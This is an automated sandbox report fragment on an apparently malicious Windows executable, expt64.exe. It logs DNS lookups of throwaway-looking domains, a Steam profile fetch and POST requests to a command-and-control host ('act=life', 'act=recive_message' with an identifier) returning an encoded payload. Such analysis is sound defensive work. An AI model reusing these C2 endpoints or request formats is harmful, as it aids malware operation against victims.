                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.065282106 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.065377951 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.065387964 CET44349725104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.492594957 CET44349725104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.492697954 CET44349725104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.492785931 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.493081093 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.493104935 CET44349725104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.552181959 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.552247047 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.552352905 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.552690029 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.552706003 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.027561903 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.027636051 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.028945923 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.028966904 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.029237032 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.030318022 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.030404091 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.030412912 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.562361002 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.562463999 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.562551975 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.586242914 CET49727443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.586278915 CET44349727104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.907653093 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.907701969 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.907783031 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.908545971 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:29.908560038 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.372078896 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.372211933 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.373699903 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.373714924 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.373994112 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.375376940 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.375400066 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.375451088 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.829986095 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.830090046 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.830192089 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.830455065 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.830478907 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.830493927 CET49728443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:30.830498934 CET44349728104.21.64.1192.168.2.12
                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.519202948 CET5635053192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.528076887 CET53563501.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.532990932 CET6459053192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.541435957 CET53645901.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.543790102 CET5626553192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.553548098 CET53562651.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.558398962 CET5428153192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.568311930 CET53542811.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.573165894 CET5312253192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.581888914 CET53531221.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.584352016 CET5637853192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.593548059 CET53563781.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.596380949 CET4941953192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.606270075 CET53494191.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.610904932 CET5247953192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.620088100 CET53524791.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.624898911 CET5074753192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.633615971 CET53507471.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.638715029 CET5201353192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.645776033 CET53520131.1.1.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.931272984 CET5551953192.168.2.121.1.1.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.940433025 CET53555191.1.1.1192.168.2.12
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.519202948 CET192.168.2.121.1.1.10xd875Standard query (0)brendon-sharjen.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.532990932 CET192.168.2.121.1.1.10xb21Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.543790102 CET192.168.2.121.1.1.10x6b86Standard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.558398962 CET192.168.2.121.1.1.10x5987Standard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.573165894 CET192.168.2.121.1.1.10xdba1Standard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.584352016 CET192.168.2.121.1.1.10x9eebStandard query (0)talkynicer.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.596380949 CET192.168.2.121.1.1.10x7cf7Standard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.610904932 CET192.168.2.121.1.1.10x6b8dStandard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.624898911 CET192.168.2.121.1.1.10x60d6Standard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.638715029 CET192.168.2.121.1.1.10xff0aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.931272984 CET192.168.2.121.1.1.10xc5cStandard query (0)sputnik-1985.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.528076887 CET1.1.1.1192.168.2.120xd875Name error (3)brendon-sharjen.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.541435957 CET1.1.1.1192.168.2.120xb21Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.553548098 CET1.1.1.1192.168.2.120x6b86Name error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.568311930 CET1.1.1.1192.168.2.120x5987Name error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.581888914 CET1.1.1.1192.168.2.120xdba1Name error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.593548059 CET1.1.1.1192.168.2.120x9eebName error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.606270075 CET1.1.1.1192.168.2.120x7cf7Name error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.620088100 CET1.1.1.1192.168.2.120x6b8dName error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.633615971 CET1.1.1.1192.168.2.120x60d6Name error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.645776033 CET1.1.1.1192.168.2.120xff0aNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.940433025 CET1.1.1.1192.168.2.120xc5cNo error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.940433025 CET1.1.1.1192.168.2.120xc5cNo error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.940433025 CET1.1.1.1192.168.2.120xc5cNo error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.940433025 CET1.1.1.1192.168.2.120xc5cNo error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.940433025 CET1.1.1.1192.168.2.120xc5cNo error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.940433025 CET1.1.1.1192.168.2.120xc5cNo error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.940433025 CET1.1.1.1192.168.2.120xc5cNo error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                        • sputnik-1985.com
                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.2.1249715104.102.49.2544436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 10:36:20 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                        2025-01-10 10:36:20 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:20 GMT
                                                                                                                                                                                                                        Content-Length: 35126
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: sessionid=b84af25699299731d3a2833f; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                        2025-01-10 10:36:20 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                        2025-01-10 10:36:20 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                                        Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                                        2025-01-10 10:36:20 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                                        Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                                        2025-01-10 10:36:20 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                        Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.2.1249716104.21.64.14436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 10:36:21 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                        Host: sputnik-1985.com
                                                                                                                                                                                                                        2025-01-10 10:36:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                        2025-01-10 10:36:21 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:21 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=m4oo2qeafbkuoqps2u7am7bdts; expires=Tue, 06 May 2025 04:23:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPyIcUzTWQ%2B%2FH1ywMcuRRr%2BO8W3zeTvJyxoTiUM5EtccWZ3ft8ne%2FCwv%2FTPI0cUsLpvm8gYsveo5eH%2FBhCggJ5%2BAkhnEF3JncYh9DAmciaJsg4XduONliojho50M%2Bed9Yd6d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffc068a5b6e7c6a-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=1995&rtt_var=790&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1349976&cwnd=218&unsent_bytes=0&cid=ffec16eb0ab2f96b&ts=473&x=0"
                                                                                                                                                                                                                        2025-01-10 10:36:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                        2025-01-10 10:36:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        2192.168.2.1249717104.21.64.14436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Length: 86
                                                                                                                                                                                                                        Host: sputnik-1985.com
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:22 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=g4028b908ioe4dqrmmfdlrm24d; expires=Tue, 06 May 2025 04:23:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EfS8wKR9TCakFmTRQOmemCieQYXHJN19uGekloNjRHncipBatxlt7N9o%2B4AcnbDLzugzWRfVfeX6l4sP8hxoBeYRbxUCUqlipTOxHjtTtMV4ARBAx8JpkK8qyFzN2ktwpz0x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffc0690ce3ede95-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1666&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=986&delivery_rate=1606160&cwnd=242&unsent_bytes=0&cid=ab345d91c7cd9283&ts=481&x=0"
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC252INData Raw: 34 33 30 63 0d 0a 4f 65 55 45 4c 34 74 31 30 44 55 48 77 4c 6a 78 69 53 55 57 31 41 68 74 42 59 68 64 46 68 61 5a 53 70 56 49 67 2f 43 72 54 36 42 43 78 33 49 4e 73 55 48 38 46 33 53 6c 6d 73 76 76 52 48 71 6e 62 55 45 6e 36 54 6b 30 4c 50 38 72 2b 54 76 6d 33 49 6b 35 7a 52 76 66 59 6b 37 6e 42 72 55 5a 4a 61 58 41 30 37 4e 2b 62 66 5a 74 41 79 65 79 66 33 4e 38 2b 79 76 35 4b 75 4b 62 78 44 2f 4d 57 6f 31 6f 53 4f 4d 51 73 31 46 6d 72 4e 57 55 37 45 42 33 76 6d 59 45 61 4f 41 77 4e 44 71 37 4c 2b 39 71 75 64 4c 6d 4b 74 52 59 71 47 56 63 34 46 65 74 47 58 7a 69 33 5a 2b 72 48 7a 53 31 62 51 39 70 37 6a 6c 39 66 76 45 69 38 53 76 6e 6d 74 73 6d 78 6c 47 4e 5a 6b 76 69 47 72 70 46 61 36 62 53 6e 2b 70 4b 64 2f 59 6b 54 32 44 79 66 79 77 30 71 42
                                                                                                                                                                                                                        Data Ascii: 430cOeUEL4t10DUHwLjxiSUW1AhtBYhdFhaZSpVIg/CrT6BCx3INsUH8F3SlmsvvRHqnbUEn6Tk0LP8r+Tvm3Ik5zRvfYk7nBrUZJaXA07N+bfZtAyeyf3N8+yv5KuKbxD/MWo1oSOMQs1FmrNWU7EB3vmYEaOAwNDq7L+9qudLmKtRYqGVc4FetGXzi3Z+rHzS1bQ9p7jl9fvEi8SvnmtsmxlGNZkviGrpFa6bSn+pKd/YkT2Dyfyw0qB
